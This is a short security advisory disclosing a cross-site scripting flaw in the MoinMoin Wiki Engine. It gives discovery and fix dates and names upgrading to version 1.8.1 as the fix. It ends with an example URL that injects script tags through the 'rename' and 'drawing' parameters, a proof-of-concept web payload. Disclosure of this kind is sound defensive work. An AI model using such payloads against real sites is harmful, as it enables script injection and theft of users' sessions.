MoinMoin Wiki Cross Site Scripting

`MoinMoin Wiki Engine Cross-Site Scripting  
  
Discovered by: SecureState R&D Team (sasquatch)  
  
Website: www.securestate.com  
  
Discovered: 01-08-09  
  
Vendor Notified: 01-08-09  
  
Vendor Fix Issued: 01-11-09 (http://hg.moinmo.in/moin/1.8/rev/8cb4d34ccbc1)  
  
Vendor Fix: Upgrade to version 1.8.1   
  
Public Posting: 01-19-09  
  
Example:  
http://moinmo.in/moinmoin/WikiSandBox?rename="><script>alert('rename xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script>  
`